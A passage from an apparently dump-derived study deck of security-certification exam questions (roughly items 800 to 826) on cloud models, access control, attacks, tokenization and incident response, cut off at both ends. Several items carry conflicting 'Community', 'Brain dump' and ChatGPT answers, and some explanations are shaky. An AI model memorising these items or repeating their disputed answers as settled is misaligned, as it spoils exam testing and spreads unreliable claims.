Therefore, A. It occurs during litigation and requires retention of both electronic and physical documents accurately describes the purpose and context of a legal hold.

800
Q

A company wants to move one of its environments to the cloud. The biggest requirement is to have as much control as possible regarding the environment. Which of the following would most likely satisfy this requirement?

A. SaaS
B. IaaS
C. PaaS
D. MaaS

A

B. IaaS (Infrastructure as a Service).

Here’s why:

IaaS: Infrastructure as a Service provides the highest level of control among the options listed. With IaaS, the company has control over the virtualized infrastructure components, such as virtual machines, storage, and networking resources. This allows them to install, configure, and manage operating systems, applications, and middleware on the cloud infrastructure.

Control: Companies opting for IaaS can choose the operating systems, applications, and configurations that best suit their needs. They have flexibility in scaling resources up or down based on demand and can implement security measures and access controls tailored to their requirements.

Other Options:
    SaaS (Software as a Service): Provides the least amount of control as the company only uses the provider's applications running on the cloud infrastructure.
    PaaS (Platform as a Service): Provides a platform and environment for developing, testing, and managing applications, but with less control over the underlying infrastructure compared to IaaS.
    MaaS (Monitoring as a Service): Typically refers to cloud-based monitoring services, not related to infrastructure control.

Therefore, B. IaaS (Infrastructure as a Service) is the option that would most likely satisfy the company’s requirement for having as much control as possible regarding the environment when moving to the cloud.

801
Q

A penetration test revealed that several Linux servers were misconfigured at the file level and access was granted incorrectly. A security analyst is referencing the instructions in the incident response runbook for remediation information. Which of the following is the best command to use to resolve the issue?

A. chmod
B. cat
C. grep
D. dig

A

A. chmod

chmod: This command is used to change the permissions of files and directories on Linux and Unix-like operating systems. It allows the security analyst to modify the permissions (read, write, execute) for the owner, group, and others, thereby correcting any misconfigurations that may have granted incorrect access.

Here’s why the other options are not suitable:

B. cat: This command is used to concatenate and display the contents of files. It does not alter file permissions.

C. grep: This command is used for searching text patterns in files. While useful for finding specific lines containing text, it does not change file permissions.

D. dig: This command is used for querying DNS name servers. It is not related to changing file permissions.

Therefore, A. chmod is the correct and best command to use for remediation in this scenario where Linux servers have misconfigured file permissions granting incorrect access.

802
Q

Which of the following is the most important security concern when using legacy systems to provide production service?

A. Instability
B. Lack of vendor support
C. Loss of availability
D. Use of insecure protocols

A

B. Lack of vendor support

Here’s why:

Lack of Vendor Support: Legacy systems often reach a point where the original vendor no longer provides updates, patches, or support. This leaves the system vulnerable to newly discovered security vulnerabilities and makes it difficult or impossible to address security issues promptly.

Security Implications: Without vendor support, there are no security patches or updates to protect the system from evolving threats. This increases the risk of exploitation through known vulnerabilities, potentially leading to data breaches, unauthorized access, or service disruptions.

Other Options:
    Instability (option A): While instability is a concern, lack of vendor support directly impacts the ability to secure and maintain the system over time.
    Loss of availability (option C): Loss of availability can be a concern, but it is often mitigated through redundancy and failover mechanisms rather than directly related to vendor support.
    Use of insecure protocols (option D): Using insecure protocols is a security concern, but it can often be addressed through configuration changes or network segmentation, whereas lack of vendor support cannot be easily remedied.

Therefore, B. Lack of vendor support is the most critical security concern when using legacy systems for production services, as it directly affects the ability to maintain the security posture of the system over its operational lifecycle.

803
Q

Which of the following would best enable a systems administrator to easily determine which devices are located at a remote facility and allow policy to be pushed to only those devices?

A. Baseline configurations
B. Network diagrams
C. Standard naming conventions
D. Hot sites

A

C. Standard naming conventions
Explanation:

Standard Naming Conventions:

Definition: Standard naming conventions involve creating a systematic way of naming devices that reflect certain attributes, such as location, function, or department.
Purpose: By using a consistent naming scheme, administrators can quickly identify and categorize devices based on their names. This is particularly useful for determining the location of devices (e.g., including site codes or location identifiers in the device names).
Policy Application: Policies can be pushed to devices that match a specific naming pattern, making it easy to target only those devices at a specific remote facility.

Why Other Options Are Less Suitable:

A. Baseline configurations:

Definition: Baseline configurations refer to a set of standard settings and configurations that all devices should adhere to.
Limitation: While useful for maintaining consistency, baseline configurations do not inherently provide information about the physical location of devices.

B. Network diagrams:

Definition: Network diagrams visually represent the network infrastructure, showing how devices are interconnected.
Limitation: Although helpful for understanding the network layout, network diagrams do not offer a quick and automated way to determine device locations or push policies.

D. Hot sites:

Definition: A hot site is a fully equipped, operational facility that a company can use in the event of a disaster.
Limitation: This concept is related to disaster recovery and business continuity rather than daily device management and policy application.

Therefore, standard naming conventions are the best choice for easily determining the location of devices and enabling the targeted application of policies.

804
Q

A company is utilizing an offshore team to help support the finance department. The company wants to keep the data secure by keeping it on a company device but does not want to provide equipment to the offshore team. Which of the following should the company implement to meet this requirement?

A. VDI
B. MDM
C. VPN
D. VPC

A

A. VDI (Virtual Desktop Infrastructure)

Here’s why VDI is the appropriate choice:

VDI: Virtual Desktop Infrastructure allows users, in this case, the offshore team, to access virtual desktops hosted on company-owned servers or cloud infrastructure. The data and applications remain centralized within the company's infrastructure, ensuring that sensitive information stays secure and is not stored locally on the offshore team's devices.

Security Benefits: With VDI, data remains within the controlled environment of the company's data center or cloud platform. Users access virtual desktops remotely using secure connections, such as VPN (Virtual Private Network) for additional security layers.

Other Options:
    MDM (Mobile Device Management) (option B): MDM focuses on managing mobile devices (like smartphones and tablets) and may not directly apply to managing virtual desktops or securing data on company devices.
    VPN (Virtual Private Network) (option C): VPN provides secure remote access to the company's network but does not inherently control data storage or access on remote devices.
    VPC (Virtual Private Cloud) (option D): VPC is a virtual network dedicated to a single organization within a cloud provider's infrastructure and does not address the requirement to secure data on company devices without providing equipment to the offshore team.

Therefore, A. VDI (Virtual Desktop Infrastructure) is the best solution for allowing the offshore team to securely access and work with company data on company-controlled devices without needing to provide physical equipment to the team.

805
Q

Which of the following is best used to detect fraud by assigning employees to different roles?

A. Least privilege
B. Mandatory vacation
C. Separation of duties
D. Job rotation

A

D. Job rotation

Job rotation will DETECT
Seperation of duties will PREVENT

806
Q

A company implemented an MDM policy to mitigate risks after repeated instances of employees losing company-provided mobile phones. In several cases, the lost phones were used maliciously to perform social engineering attacks against other employees. Which of the following MDM features should be configured to best address this issue? (Choose two.)

A. Screen locks
B. Remote wipe
C. Full device encryption
D. Push notifications
E. Application management
F. Geolocation

A

(Community : AB 62%, BC 37%)
A. Screen locks
B. Remote wipe

Here’s why these features are appropriate:

Screen locks (option A): Configuring screen locks ensures that if a device is lost or left unattended, it automatically locks after a period of inactivity. This prevents unauthorized access to the device and the data it contains, reducing the risk of malicious use.

Remote wipe (option B): Remote wipe allows administrators to remotely erase all data on a lost or stolen device. This feature is crucial in ensuring that sensitive company information does not fall into the wrong hands and cannot be used for malicious purposes.

Other Options:
    Full device encryption (option C): While important for protecting data at rest, it does not directly prevent malicious use if the device is lost or stolen.
    Push notifications (option D): While useful for sending alerts or updates to devices, it does not directly mitigate the risk of malicious use.
    Application management (option E): Involves controlling which applications can be installed on devices, but it does not directly address the issue of lost devices being used for social engineering attacks.
    Geolocation (option F): Helps in locating lost or stolen devices, but it does not prevent malicious use once the device is lost.

Therefore, A. Screen locks and B. Remote wipe are the MDM features that should be configured to best mitigate the risk of lost company-provided mobile phones being used maliciously for social engineering attacks.

(Brain dump: B. Remote wipe, C. Full device encryption)

807
Q

During a recent company safety stand-down, the cyber-awareness team gave a presentation on the importance of cyber hygiene. One topic the team covered was best practices for printing centers. Which of the following describes an attack method that relates to printing centers?

A. Whaling
B. Credential harvesting
C. Prepending
D. Dumpster diving

A

D. Dumpster diving

Here’s why:

Dumpster diving: This attack method involves searching through physical trash or recycling bins to find sensitive information that has been discarded improperly. In the context of printing centers, documents that are printed but not securely disposed of could end up in trash bins. Attackers can then retrieve these documents through dumpster diving to obtain sensitive information such as passwords, financial data, or confidential business information.

Printing Centers: Printing centers often handle documents that may contain sensitive or confidential information. If these documents are not securely disposed of after use, they pose a significant risk if retrieved by unauthorized individuals through dumpster diving.

Other Options:
    Whaling (option A): Whaling refers to a specific type of phishing attack targeting high-profile individuals within an organization, typically executives. It does not directly relate to printing centers.
    Credential harvesting (option B): This involves gathering login credentials through various means such as phishing, keylogging, or social engineering. It does not specifically relate to printing centers.
    Prepending (option C): This term refers to adding something at the beginning of a file or data stream, not typically related to physical security risks like dumpster diving.

Therefore, D. Dumpster diving is the attack method that relates to printing centers, highlighting the importance of securely disposing of printed documents to prevent unauthorized access to sensitive information.

808
Q

The security operations center is researching an event concerning a suspicious IP address. A security analyst looks at the following event logs and discovers that a significant portion of the user accounts have experienced failed log-in attempts when authenticating from the same IP address:

184.168.131.241 - userA - failed authentication
184.168.131.241 - userA - failed authentication
184.168.131.241 - userB - failed authentication
184.168.131.241 - userB - failed authentication
184.168.131.241 - userC - failed authentication
184.168.131.241 - userC - failed authentication

Which of the following most likely describes the attack that took place?

A. Spraying
B. Brute-force
C. Dictionary
D. Rainbow table

A

A. Spraying

Here’s why:

Spraying: In a spraying attack, attackers attempt to gain unauthorized access to multiple accounts by trying a small number of commonly used passwords or weak credentials across many accounts. The goal is to avoid triggering account lockouts or detection mechanisms that typically respond to numerous failed attempts on a single account.

Event Scenario: The logs show multiple failed authentication attempts across different user accounts (userA, userB, userC) from the same IP address. This pattern suggests that the attacker is trying a few credentials across various accounts to avoid detection, which aligns with the spraying attack method.

Other Options:
    Brute-force (option B): Brute-force attacks involve systematically trying all possible combinations of passwords until the correct one is found. This would typically result in many failed attempts on the same account, not spread across multiple accounts as shown in the logs.
    Dictionary (option C): Dictionary attacks involve using a predefined list of common passwords or words. However, this attack method also typically focuses on a single account rather than multiple accounts simultaneously.
    Rainbow table (option D): Rainbow table attacks are based on precomputed tables used to crack hashed passwords quickly. This is not indicated by the log entries provided, which show failed authentication attempts without reference to password cracking or hash tables.

Therefore, A. Spraying is the attack method that most likely describes the event where multiple user accounts experienced failed log-in attempts from the same IP address.

809
Q

Which of the following is an algorithm performed to verify that data has not been modified?

A. Hash
B. Code check
C. Encryption
D. Checksum

A

A. Hash

Hashing is the process of taking an input (or ‘message’) and returning a fixed-size string of bytes. This output, known as the hash value or hash code, is unique to the specific input and is determined by the hashing algorithm used. Hash functions are designed to be fast to compute and irreversibly transform data into a fixed-size output.

Here’s why the other options are not correct:

Code check (option B): This generally refers to verifying the integrity or correctness of software code rather than data integrity.

Encryption (option C): Encryption is a process of transforming data to make it unreadable without specific knowledge or keys. While encryption can ensure confidentiality, it does not inherently verify data integrity.

Checksum (option D): Checksums are a form of error-detecting code used to detect accidental changes to raw data, such as file transfers. While similar to hashing in some aspects, checksums are generally simpler and less secure for ensuring data integrity compared to cryptographic hash functions.

Therefore, A. Hash is the algorithm performed to verify that data has not been modified, ensuring data integrity by producing a unique hash value based on the content of the data itself.

(Brain dump : D. Checksum)

810
Q

A network administrator deployed a DNS logging tool that logs suspicious websites that are visited and then sends a daily report based on various weighted metrics. Which of the following best describes the type of control the administrator put in place?

A. Preventive
B. Deterrent
C. Corrective
D. Detective

A

D. Detective

Here’s why:

Detective controls: These are controls that are designed to identify and record potentially harmful activities or security violations. They provide information about what has happened, enabling the organization to respond appropriately. The DNS logging tool that logs suspicious websites and sends reports helps to detect and record any potentially malicious or suspicious activity, making it a detective control.

Other Options:
    Preventive (option A): Preventive controls are intended to stop or prevent security incidents from occurring in the first place. Examples include firewalls, antivirus software, and access controls. The DNS logging tool does not prevent access to suspicious websites but rather logs and reports it.
    Deterrent (option B): Deterrent controls are intended to discourage individuals from engaging in potentially harmful activities. Examples include warning banners and surveillance cameras. While the logging tool might have a minor deterrent effect, its primary function is to detect and report.
    Corrective (option C): Corrective controls are designed to correct or mitigate the effects of an incident after it has occurred. Examples include backup systems and incident response plans. The DNS logging tool does not correct issues but detects and logs them.

Therefore, D. Detective best describes the type of control the administrator put in place with the DNS logging tool.

811
Q

A business uses Wi-Fi with content filtering enabled. An employee noticed a coworker accessed a blocked site from a work computer and reported the issue. While investigating the issue, a security administrator found another device providing internet access to certain employees. Which of the following best describes the security risk?

A. The host-based security agent is not running on all computers.
B. A rogue access point is allowing users to bypass controls.
C. Employees who have certain credentials are using a hidden SSID.
D. A valid access point is being jammed to limit availability.

A

B. A rogue access point is allowing users to bypass controls.

Here’s why:

Rogue Access Point: A rogue access point is an unauthorized wireless access point that has been installed on a network without the knowledge or permission of the network administrator. Rogue access points can provide unrestricted access to the internet, bypassing the company's security measures, such as content filtering and monitoring. This can lead to significant security risks as employees can access blocked or malicious sites, potentially exposing the network to security threats.

Other Options:
    Host-based security agent is not running on all computers (option A): While this could be a security concern, it does not directly explain the ability to access blocked sites via another device providing internet access.
    Employees using a hidden SSID (option C): This implies using a different, possibly authorized network with hidden SSID, which is not the main issue described. The main problem is the unauthorized internet access via another device.
    Valid access point being jammed (option D): This suggests interference with legitimate access points to deny service, which does not align with the scenario where employees are accessing the internet through another device.

Therefore, B. A rogue access point is allowing users to bypass controls best describes the security risk in the given situation.

812
Q

While considering the organization’s cloud-adoption strategy, the Chief Information Security Officer sets a goal to outsource patching of firmware, operating systems, and applications to the chosen cloud vendor. Which of the following best meets this goal?

A. Community cloud
B. PaaS
C. Containerization
D. Private cloud
E. SaaS
F. IaaS

A

E. SaaS (Software as a Service)

Here’s why:

SaaS (Software as a Service): SaaS is a cloud service model where the cloud provider is responsible for managing the entire infrastructure, including the hardware, operating system, and the software applications. This means that patching of firmware, operating systems, and applications is handled by the SaaS provider. Users access the software over the internet, and the provider takes care of maintenance, including updates and security patches.

Other Options:
    Community cloud (option A): This refers to a cloud infrastructure shared by several organizations with common concerns (e.g., security, compliance). While it provides shared resources, it does not inherently outsource patching responsibilities.
    PaaS (Platform as a Service) (option B): PaaS provides a platform allowing customers to develop, run, and manage applications without dealing with the underlying infrastructure. The provider manages the underlying infrastructure and operating systems, but the customer may still need to handle application-level patching.
    Containerization (option C): This is a technology used to package and run applications and their dependencies in isolated environments. While it helps in application deployment, it does not itself handle patching responsibilities.
    Private cloud (option D): A private cloud is a cloud infrastructure operated solely for a single organization. The organization typically retains control over and responsibility for its infrastructure, including patching.
    IaaS (Infrastructure as a Service) (option F): IaaS provides virtualized computing resources over the internet. While the provider manages the hardware and virtualization, the customer is responsible for patching the operating systems and applications.

Therefore, E. SaaS best meets the goal of outsourcing the patching of firmware, operating systems, and applications to the chosen cloud vendor.

813
Q

A spoofed identity was detected for a digital certificate. Which of the following are the type of unidentified key and the certificate that could be in use on the company domain?

A. Private key and root certificate
B. Public key and expired certificate
C. Private key and self-signed certificate
D. Public key and wildcard certificate

A

C. Private key and self-signed certificate

Here’s why:

Self-signed Certificate: A self-signed certificate is signed by the entity that it certifies rather than a trusted Certificate Authority (CA). Because it is not verified by a third party, it is easier for an attacker to spoof the identity associated with the certificate.

Private Key: The private key is used in conjunction with the certificate for authentication and encryption. If a spoofed identity is detected, it indicates that the private key, which is supposed to be secret, might have been compromised or replaced in the context of the self-signed certificate.

Other Options:
    Private key and root certificate (option A): A root certificate is issued by a trusted CA and used to authenticate subordinate certificates. It is less likely to be spoofed because it is widely trusted and strictly controlled.
    Public key and expired certificate (option B): An expired certificate would not be trusted by browsers and systems, but it does not directly relate to identity spoofing.
    Public key and wildcard certificate (option D): A wildcard certificate is used to secure multiple subdomains with a single certificate. While it involves a public key, the issue described is more aligned with self-signed certificates where trust is not established by a third party.

Therefore, the combination of C. Private key and self-signed certificate best describes the scenario where a spoofed identity was detected for a digital certificate on the company domain.

814
Q

A software developer would like to ensure the source code cannot be reverse engineered or debugged. Which of the following should the developer consider?

A. Version control
B. Obfuscation toolkit
C. Code reuse
D. Continuous integration
E. Stored procedures

A

B. Obfuscation toolkit

Here’s why:

Obfuscation toolkit: Code obfuscation is the process of modifying the source code to make it more difficult to understand and reverse engineer while preserving its functionality. An obfuscation toolkit will transform the code into a form that is hard for humans to interpret and for tools to analyze, thereby protecting it from reverse engineering and debugging.

Other Options:
    Version control (option A): Version control systems (like Git) are used to manage changes to source code over time. While important for software development, they do not prevent reverse engineering or debugging.
    Code reuse (option C): Code reuse involves using existing code for new functions or software. While it can improve efficiency, it does not inherently protect against reverse engineering.
    Continuous integration (option D): Continuous integration is a development practice where code changes are automatically tested and integrated into a shared repository. It improves software quality and collaboration but does not protect against reverse engineering.
    Stored procedures (option E): Stored procedures are precompiled collections of SQL statements and optional control-of-flow statements stored under a name and processed as a unit. They are used in databases and can enhance security within the database context but do not directly address the protection of source code from reverse engineering.

Therefore, B. Obfuscation toolkit is the appropriate choice for a developer looking to ensure that the source code cannot be easily reverse engineered or debugged.

815
Q

Which of the following is the most effective way to protect an application server running software that is no longer supported from network threats?

A. Air gap
B. Barricade
C. Port security
D. Screened subnet

A

Community : D 71%, A 29%
D. Screened subnet

One of the most effective ways to protect an application server is to use a screened subnet. A screened subnet is a network segment that is isolated from both the internet and the internal network by two firewalls. The application server is placed in the screened subnet, also known as the demilitarized zone (DMZ), and only the necessary ports are opened for communication. This way, the application server is shielded from external attacks and internal breaches, and the impact of a compromise is minimized.

ChatGPT & Brain dump:
A. Air gap

Here’s why:

Air gap: An air gap involves physically isolating the server from any network connections, effectively cutting it off from all external threats. This is the most secure method to protect an unsupported server from network-based attacks since there is no network path for an attacker to exploit.

Other Options:
    Barricade (option B): This is not a standard network security term. It might imply a physical barrier or some form of defense, but it is not a specific, effective network security measure.
    Port security (option C): Port security is a feature on network switches that can control access to specific ports. While useful for securing network segments, it does not provide comprehensive protection for an unsupported application server.
    Screened subnet (option D): A screened subnet (or DMZ) is a network segment that is isolated from an internal network by a firewall. While it can limit exposure, it still allows some network access, which can be a risk for unsupported software.

Therefore, A. Air gap is the most effective way to protect an application server with unsupported software from network threats by completely isolating it from potential network-based attacks.

816
Q

A growing company would like to enhance the ability of its security operations center to detect threats but reduce the amount of manual work required for the security analysts. Which of the following would best enable the reduction in manual work?

A. SOAR
B. SIEM
C. MDM
D. DLP

A

A. SOAR (Security Orchestration, Automation, and Response)

Here’s why:

SOAR (Security Orchestration, Automation, and Response): SOAR platforms are designed to improve the efficiency and effectiveness of security operations by automating repetitive tasks, orchestrating workflows, and integrating various security tools and data sources. This reduces the manual workload for security analysts and allows them to focus on more complex and strategic tasks. SOAR can automate incident response, threat detection, and other security operations processes, significantly enhancing the SOC's capabilities.

Other Options:
    SIEM (Security Information and Event Management) (option B): SIEM systems collect and analyze security event data from various sources to detect threats and generate alerts. While SIEM is crucial for threat detection and response, it does not inherently automate responses and can still require significant manual intervention.
    MDM (Mobile Device Management) (option C): MDM solutions are used to manage and secure mobile devices within an organization. While important for mobile security, MDM does not directly reduce manual work for threat detection and response in the SOC.
    DLP (Data Loss Prevention) (option D): DLP solutions help prevent data breaches by monitoring and controlling data transfers and access. DLP is focused on data security rather than overall threat detection and response automation.

Therefore, A. SOAR is the best option to enable the reduction in manual work for security analysts while enhancing the SOC’s ability to detect and respond to threats.

817
Q

Which of the following can a security director use to prioritize vulnerability patching within a company’s IT environment?

A. SOAR
B. CVSS
C. SIEM
D. CVE

A

B. CVSS (Common Vulnerability Scoring System)

Here’s why:

CVSS (Common Vulnerability Scoring System): CVSS provides a standardized way to assess and score the severity of vulnerabilities. It helps security professionals prioritize vulnerability patching by assigning a numerical score to each vulnerability, reflecting its potential impact and exploitability. This scoring system allows organizations to focus on the most critical vulnerabilities first.

Other Options:
    SOAR (Security Orchestration, Automation, and Response) (option A): SOAR tools can automate and orchestrate responses to security incidents, but they do not specifically provide a system for scoring and prioritizing vulnerabilities.
    SIEM (Security Information and Event Management) (option C): SIEM systems collect and analyze security event data, providing real-time monitoring and alerts for potential threats. While valuable for threat detection and response, SIEM does not specifically provide a method for prioritizing vulnerability patching.
    CVE (Common Vulnerabilities and Exposures) (option D): CVE is a list of publicly disclosed information security vulnerabilities and exposures. While it is useful for identifying and referencing vulnerabilities, CVE itself does not provide a scoring or prioritization system.

Therefore, B. CVSS is the appropriate tool for a security director to use in prioritizing vulnerability patching within a company’s IT environment.

818
Q

The Chief Information Security Officer wants to put security measures in place to protect PH. The organization needs to use its existing labeling and classification system to accomplish this goal. Which of the following would most likely be configured to meet the requirements?

A. Tokenization
B. S/MIME
C. DLP
D. MFA

A

C. DLP (Data Loss Prevention)

Here’s why:

DLP (Data Loss Prevention): DLP solutions are designed to detect and prevent data breaches by monitoring and controlling data transfers and ensuring that sensitive information is not shared or accessed inappropriately. DLP can be configured to work with an existing labeling and classification system to enforce policies that protect PII by identifying, monitoring, and controlling the movement of sensitive data across the organization.

Other Options:
    Tokenization (option A): Tokenization replaces sensitive data with non-sensitive tokens. While it protects data, it does not directly integrate with labeling and classification systems to enforce security policies.
    S/MIME (option B): Secure/Multipurpose Internet Mail Extensions (S/MIME) is used to secure email communications through encryption and digital signatures. It does not address the broader requirement of protecting PII across the organization.
    MFA (Multi-Factor Authentication) (option D): MFA enhances access security by requiring multiple forms of verification. While important for protecting access to systems and data, it does not specifically address data protection and classification.

Therefore, C. DLP is the best option to configure in order to meet the requirements of protecting PII using the existing labeling and classification system.

819
Q

A company wants to get alerts when others are researching and doing reconnaissance on the company. One approach would be to host a part of the infrastructure online with known vulnerabilities that would appear to be company assets. Which of the following describes this approach?

A. Watering hole
B. Bug bounty
C. DNS sinkhole
D. Honeypot

A

D. Honeypot

Here’s why:

Honeypot: A honeypot is a security mechanism set up to detect, deflect, or study attempts at unauthorized access to information systems. By deliberately hosting vulnerable systems that appear to be legitimate company assets, a honeypot can attract attackers and provide alerts when reconnaissance or other malicious activities are detected. This helps the company understand and respond to potential threats.

Other Options:
    Watering hole (option A): A watering hole attack involves compromising a legitimate website that is frequented by the target group, infecting it with malware to compromise users when they visit the site. It is an offensive technique rather than a defensive one.
    Bug bounty (option B): A bug bounty program is an initiative where organizations offer rewards to individuals for discovering and reporting vulnerabilities in their systems. This approach involves inviting external security researchers to find vulnerabilities, not setting up vulnerable systems for detection purposes.
    DNS sinkhole (option C): A DNS sinkhole is used to redirect malicious traffic to a controlled IP address to prevent users from reaching harmful websites. It is more about preventing access to malicious domains than detecting reconnaissance activities.

Therefore, D. Honeypot is the correct term for the described approach.

820
Q

Which of the following is the final step of the incident response process?

A. Lessons learned
B. Eradication
C. Containment
D. Recovery

A

A. Lessons learned

Here’s why:

Lessons learned: After an incident has been contained, eradicated, and the affected systems have been recovered, the incident response team conducts a review. This review includes analyzing the incident, identifying what worked well and what did not, documenting lessons learned, and making recommendations for improvements to prevent similar incidents in the future. This step is crucial for continuous improvement of the organization's incident response capabilities.

Other Options:
    Eradication (option B): Eradication involves completely removing the threat or malware from affected systems. It typically occurs after containment but before recovery.
    Containment (option C): Containment involves limiting the spread and impact of the incident to prevent further damage. It is an early step in the incident response process.
    Recovery (option D): Recovery involves restoring affected systems to normal operation and ensuring business continuity. It is a necessary step but occurs before the lessons learned phase.

Therefore, A. Lessons learned is the final step of the incident response process, where the focus is on improving the organization’s overall security posture based on the insights gained from handling the incident.

821
Q

A systems administrator is redesigning how devices will perform network authentication. The following requirements need to be met:

  • An existing internal certificate must be used.
  • Wired and wireless networks must be supported.
  • Any unapproved device should be isolated in a quarantine subnet.
  • Approved devices should be updated before accessing resources.

Which of the following would best meet the requirements?

A. 802.1X
B. EAP
C. RADIUS
D. WPA2

A

A. 802.1X

Here’s how 802.1X meets each requirement:

Use of an existing internal certificate: 802.1X supports the use of digital certificates for authentication, allowing the administrator to use an existing internal certificate for authentication purposes.

Support for wired and wireless networks: 802.1X is a standard protocol that supports both wired (IEEE 802.3) and wireless (IEEE 802.11) networks, providing a unified authentication mechanism.

Isolation of unapproved devices in a quarantine subnet: With 802.1X, devices that fail authentication can be placed into a quarantine VLAN or subnet, isolating them from the main network until they meet compliance requirements.

Updating approved devices before accessing resources: Approved devices can be subjected to network policies and configuration updates upon authentication through 802.1X before gaining access to network resources.

Other Options:

EAP (Option B): Extensible Authentication Protocol (EAP) is an authentication framework that works with various authentication methods, including within 802.1X. It does not, however, provide the complete network access control and isolation capabilities described.

RADIUS (Option C): Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that provides centralized Authentication, Authorization, and Accounting (AAA) management. While integral to 802.1X implementations, RADIUS alone does not meet all the described requirements.

WPA2 (Option D): Wi-Fi Protected Access 2 (WPA2) is a security protocol for wireless networks, not wired networks, and does not provide the level of device authentication and network access control required across both wired and wireless networks.

Therefore, A. 802.1X is the best choice for meeting the specified requirements for network authentication in this scenario.

822
Q

An IT security team is concerned about the confidentiality of documents left unattended in MFPs. Which of the following should the security team do to mitigate the situation?

A. Educate users about the importance of paper shredder devices.
B. Deploy an authentication factor that requires in-person action before printing.
C. Install a software client in every computer authorized to use the MFPs.
D. Update the management software to utilize encryption.

A

B. Deploy an authentication factor that requires in-person action before printing.

MFPs = Multi-Function Printers

Here’s why this is the best option:

Authentication factor requiring in-person action: By requiring users to physically authenticate themselves at the MFP before printing (for example, using a proximity card, PIN code, or biometric authentication), the security team can ensure that only authorized personnel are able to retrieve printed documents promptly. This reduces the risk of documents being left unattended in the output tray.

Other Options Considered:
    Educate users about paper shredder devices (Option A): While educating users about secure disposal methods is important, it does not directly address the issue of documents being left unattended in MFPs.
    Install a software client in every authorized computer (Option C): This might enhance control over print jobs but does not mitigate the risk of unattended printed documents.
    Update management software to utilize encryption (Option D): Encrypting print jobs and data transmission can protect data in transit but does not address the physical security of printed documents left in the output tray.

Therefore, B. Deploy an authentication factor that requires in-person action before printing is the most effective measure to mitigate the risk of confidentiality breaches due to unattended documents in MFPs.

823
Q

A security analyst finds a rogue device during a monthly audit of current endpoint assets that are connected to the network. The corporate network utilizes 802.1 X for access control. To be allowed on the network, a device must have a known hardware address, and a valid username and password must be entered in a captive portal. The following is the audit report:

IP address MAC Host Account
10.18.04.42 BE-AC-11-F1-E4-44 PC-NY user1
10.18.04.38 EB-AC-11-82-42-F3 PC-CA user3
10.18.04.59 28-BB-5A-11-52-29 PC-PA user2
10.18.04.58 28-BB-5A-F0-E9-D1 PC-TX user4
10.18.04.22 EB-AC-11-82-42-F3 WIN10 user3
10.18.04.26 BB-28-11-21-A2-73 PC-NJ admin

Which of the following is the most likely way a rogue device was allowed to connect?

A. A user performed a MAC cloning attack with a personal device.
B. A DHCP failure caused an incorrect IP address to be distributed
C. An administrator bypassed the security controls for testing.
D. DNS hijacking let an attacker intercept the captive portal traffic.

A

A. A user performed a MAC cloning attack with a personal device.

Here’s why:

MAC address duplication: In an 802.1X environment, devices are authenticated based on their MAC addresses and user credentials. If a user clones the MAC address of an authorized device (such as a PC), the network may recognize the cloned MAC address as legitimate and grant network access, assuming the user also provides valid credentials via the captive portal. This allows the rogue device to bypass the network's security controls and gain unauthorized access.

Other Options Considered:
    DHCP failure causing an incorrect IP address (Option B): DHCP issues typically result in connectivity problems or IP conflicts but do not directly bypass 802.1X authentication.
    Administrator bypassing security controls for testing (Option C): While possible, proper procedures would involve notifying stakeholders and ensuring such actions do not compromise security controls permanently.
    DNS hijacking allowing interception of captive portal traffic (Option D): DNS hijacking primarily affects DNS resolution and could redirect traffic, but it does not directly bypass MAC-based 802.1X authentication.

Therefore, A. A user performed a MAC cloning attack with a personal device aligns most closely with how a rogue device could circumvent the network’s 802.1X authentication and connect to the network.

824
Q

A security administrator recently reset local passwords and the following values were
recorded in the system:

Host Account MD5 password values
ACCT-PC-1 admin f1bdf5ed1d7adede4e3809bd35644b0
HR-PC-1 admin d706ab8258fe67c131ebc57a6e28184
IT-PC-2 admin f8ddb9cbb321d7dfbf6cb05973f0b3d
FILE-SRV-1 admin f054bbd2f5ebab9cb5571000b2c60c02
DB-SRV-1 admin 8638f732ba7cf2d95b1697e2725da78

Which of the following is the security administrator most likely protecting against?

A. Account sharing
B. Weak password complexity
C. Pass-the-hash attacks
D. Password compromise

A

(Community : C 52%, D 48%)
C. Pass-the-hash attacks

Here’s why:

MD5 password values: The MD5 hashes provided in the system indicate that passwords are stored in a hashed format. However, MD5 hashes are vulnerable to being cracked, especially if the passwords they represent are weak or common.

Pass-the-hash attacks: In pass-the-hash attacks, attackers capture hashed credentials (like MD5 hashes) from compromised systems and use them to authenticate to other systems without needing to crack the original password. This method allows attackers to bypass traditional authentication mechanisms that rely on plaintext passwords.

Other Options Considered:
    Account sharing (Option A): While a concern, resetting passwords would not directly mitigate account sharing unless combined with other measures.
    Weak password complexity (Option B): Resetting passwords might improve password complexity if new policies are enforced, but MD5 hashes do not directly indicate weak complexity.
    Password compromise (Option D): Resetting passwords aims to prevent compromise, but MD5 hashes do not directly indicate compromise unless they are cracked.

Therefore, the security administrator resetting local passwords and recording MD5 hashes is likely protecting against C. Pass-the-hash attacks, aiming to mitigate the risk of attackers using captured password hashes to gain unauthorized access to other systems.

(Brain dump: D. Password compromise)

825
Q

Which of the following characteristics of tokenization explains how credit card information that is stored in a database is protected?

A. The fields are irreversible.
B. Symmetric algorithms are used.
C. Only authorized card holders have access.
D. The data is relabeled.

A

(Brain dump: D. The data is relabeled)
(Community : D 70%, A 30%)
D. The data is relabeled.

Tokenization does not maake the fileds irreversible, use symmetric algorithms, or restrict access to authorizeed card holders. It simply chnages the data into a different format that has no value outside the context of the transaction

Chat GPT:
A. The fields are irreversible.

Here’s why:

Irreversible fields: Tokenization involves replacing sensitive data (such as credit card numbers) with unique identification symbols (tokens) that retain essential information about the data without compromising its security. Unlike encryption, which can be decrypted to retrieve the original data, tokenization is irreversible. Once a credit card number is tokenized, there is no straightforward way to reverse the process to obtain the original card number without access to the tokenization system's mapping or tokenization vault.

Other Options Considered:
    Symmetric algorithms are used (Option B): Symmetric algorithms are not specifically tied to tokenization. They are more commonly associated with encryption methods rather than tokenization.
    Only authorized card holders have access (Option C): Access control is a general security principle that applies to protecting data systems, but it does not specifically describe tokenization.
    The data is relabeled (Option D): While tokenization does involve replacing sensitive data with tokens, the term "relabeled" is not typically used in the context of tokenization.

Therefore, A. The fields are irreversible accurately describes how tokenization protects credit card information by ensuring that the original sensitive data cannot be reconstructed from the tokens stored in the database.

826
Q

A systems administrator wants to implement a backup solution. The solution needs to allow recovery of the entire system, including the operating system, in case of a disaster. Which of the following backup types should the administrator consider?

A. Incremental
B. Storage area network
C. Differential
D. Image

A

D. Image

Here’s why:

